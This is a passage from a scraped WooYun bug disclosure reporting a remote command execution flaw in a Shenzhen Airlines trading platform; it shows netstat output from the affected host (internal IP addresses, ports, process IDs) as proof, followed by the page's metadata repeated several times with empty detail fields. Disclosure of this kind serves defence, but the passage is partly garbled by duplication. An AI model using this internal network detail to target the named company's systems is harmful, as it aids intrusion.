  TCP    10.12.66.29:8088       59.151.29.91:61523     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:61599     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:61642     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:61826     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:62296     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:62457     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:62727     TIME_WAIT       0
  TCP    10.12.66.29:9009       10.12.66.29:1702       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:1703       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:1705       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:1706       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:3282       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:4533       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:4736       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:4737       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:4950       ESTABLISHED     6212
  TCP    10.12.66.29:38888      10.12.69.51:48610      ESTABLISHED     2044
  TCP    127.0.0.1:1031         0.0.0.0:0              LISTENING       2500
  TCP    127.0.0.1:1371         127.0.0.1:1372         ESTABLISHED     5696
  TCP    127.0.0.1:1372         127.0.0.1:1371         ESTABLISHED     5696
  TCP    127.0.0.1:1383         127.0.0.1:1384         ESTABLISHED     6212
  TCP    127.0.0.1:1384         127.0.0.1:1383         ESTABLISHED     6212
  TCP    127.0.0.1:1391         127.0.0.1:1392         ESTABLISHED     5696
  TCP    127.0.0.1:1392         127.0.0.1:1391         ESTABLISHED     5696
  TCP    127.0.0.1:1393         127.0.0.1:1394         ESTABLISHED     5696
  TCP    127.0.0.1:1394         127.0.0.1:1393         ESTABLISHED     5696
  TCP    127.0.0.1:1395         127.0.0.1:1396         ESTABLISHED     5696
  TCP    127.0.0.1:1396         127.0.0.1:1395         ESTABLISHED     5696
  TCP    127.0.0.1:1397         127.0.0.1:1398         ESTABLISHED     5696
  TCP    127.0.0.1:1398         127.0.0.1:1397         ESTABLISHED     5696
  TCP    127.0.0.1:1399         127.0.0.1:1400         ESTABLISHED     5696
  TCP    127.0.0.1:1400         127.0.0.1:1399         ESTABLISHED     5696
  TCP    127.0.0.1:1401         127.0.0.1:1402         ESTABLISHED     5696
  TCP    127.0.0.1:1402         127.0.0.1:1401         ESTABLISHED     5696
  TCP    127.0.0.1:1403         127.0.0.1:1404         ESTABLISHED     5696
  TCP    127.0.0.1:1404         127.0.0.1:1403         ESTABLISHED     5696
  TCP    127.0.0.1:1405         127.0.0.1:1406         ESTABLISHED     5696
  TCP    127.0.0.1:1406         127.0.0.1:1405         ESTABLISHED     5696
  TCP    127.0.0.1:1467         127.0.0.1:1468         ESTABLISHED     6212
  TCP    127.0.0.1:1468         127.0.0.1:1467         ESTABLISHED     6212
  TCP    127.0.0.1:1469         127.0.0.1:1470         ESTABLISHED     6212
  TCP    127.0.0.1:1470         127.0.0.1:1469         ESTABLISHED     6212
  TCP    127.0.0.1:1471         127.0.0.1:1472         ESTABLISHED     6212
  TCP    127.0.0.1:1472         127.0.0.1:1471         ESTABLISHED     6212
  TCP    127.0.0.1:1473         127.0.0.1:1474         ESTABLISHED     6212
  TCP    127.0.0.1:1474         127.0.0.1:1473         ESTABLISHED     6212
  TCP    127.0.0.1:1475         127.0.0.1:1477         ESTABLISHED     6212
  TCP    127.0.0.1:1477         127.0.0.1:1475         ESTABLISHED     6212
  TCP    127.0.0.1:1478         127.0.0.1:1479         ESTABLISHED     6212
  TCP    127.0.0.1:1479         127.0.0.1:1478         ESTABLISHED     6212
  TCP    127.0.0.1:1480         127.0.0.1:1481         ESTABLISHED     6212
  TCP    127.0.0.1:1481         127.0.0.1:1480         ESTABLISHED     6212
  TCP    127.0.0.1:1482         127.0.0.1:1483         ESTABLISHED     6212
  TCP    127.0.0.1:1483         127.0.0.1:1482         ESTABLISHED     6212
  TCP    127.0.0.1:5152         0.0.0.0:0              LISTENING       1248
  TCP    127.0.0.1:8005         0.0.0.0:0              LISTENING       5696
  TCP    127.0.0.1:8065         0.0.0.0:0              LISTENING       5316
  TCP    127.0.0.1:8085         0.0.0.0:0              LISTENING       1748
  TCP    127.0.0.1:8181         0.0.0.0:0              LISTENING       8792
  TCP    127.0.0.1:9005         0.0.0.0:0              LISTENING       6212
  UDP    0.0.0.0:161            *:*                                    1764
  UDP    0.0.0.0:445            *:*                                    4
  UDP    0.0.0.0:500            *:*                                    484
  UDP    0.0.0.0:2425           *:*                                    4680
  UDP    0.0.0.0:4446           *:*                                    5696
  UDP    0.0.0.0:4446           *:*                                    5696
  UDP    0.0.0.0:4446           *:*                                    6212
  UDP    0.0.0.0:4446           *:*                                    6212
  UDP    0.0.0.0:4500           *:*                                    484
  UDP    0.0.0.0:4646           *:*                                    4680
  UDP    0.0.0.0:45564          *:*                                    6212
  UDP    0.0.0.0:45564          *:*                                    5696
  UDP    10.12.66.29:123        *:*                                    812
  UDP    10.12.66.29:137        *:*                                    4
  UDP    10.12.66.29:138        *:*                                    4
  UDP    127.0.0.1:123          *:*                                    812
  UDP    127.0.0.1:1032         *:*                                    2424

影响内网安全

修复方案：

版权声明：转载请注明来源艺术家@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-06-20 15:50

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0218722

漏洞标题：深圳航空某交易平台远程执行漏洞

相关厂商：深圳航空

漏洞作者：艺术家

提交时间：2016-06-14 09:48

修复时间：2016-06-20 15:50

公开时间：2016-06-20 15:50

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源艺术家@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0218722

漏洞标题：深圳航空某交易平台远程执行漏洞

相关厂商：深圳航空

漏洞作者： 艺术家

提交时间：2016-06-14 09:48

修复时间：2016-06-20 15:50

公开时间：2016-06-20 15:50

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0218722"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 艺术家@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：艺术家

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源艺术家@乌云